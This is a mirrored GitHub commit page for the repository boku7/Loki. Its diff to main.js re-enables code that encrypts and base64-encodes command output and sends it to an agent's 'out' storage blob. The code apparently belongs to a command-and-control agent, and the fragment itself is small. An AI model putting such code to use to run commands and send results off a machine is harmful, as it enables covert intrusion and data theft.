1
0
mirror of https://github.com/boku7/Loki synced 2026-06-06 15:24:27 +00:00

Update main.js

fix assembly output send to bucket
This commit is contained in:
Bobby Cooke
2025-04-10 13:37:07 -07:00
committed by GitHub
parent 034110dae1
commit 617ca5cd84
+4 -4
View File
@@ -355,9 +355,9 @@ try{
key = Buffer.from(key, 'hex');
iv = Buffer.from(iv, 'hex');
fileop = false;
// let command_output = await func_Encrypt(ipcoutput, key,iv);
// command_output = await func_Base64_Encode(command_output);
// agentwindow.webContents.send('send-output',agent.container.name, agent.container.blobs['out'],command_output);
let command_output = await func_Encrypt(ipcoutput, key,iv);
command_output = await func_Base64_Encode(command_output);
agentwindow.webContents.send('send-output',agent.container.name, agent.container.blobs['out'],command_output);
if (handover === false)
{
//execwindow.close();
@@ -366,4 +366,4 @@ try{
{
func_log(`[!] Error in end-file-op IPC main.js ${error} ${error.stack}`);
}
});
});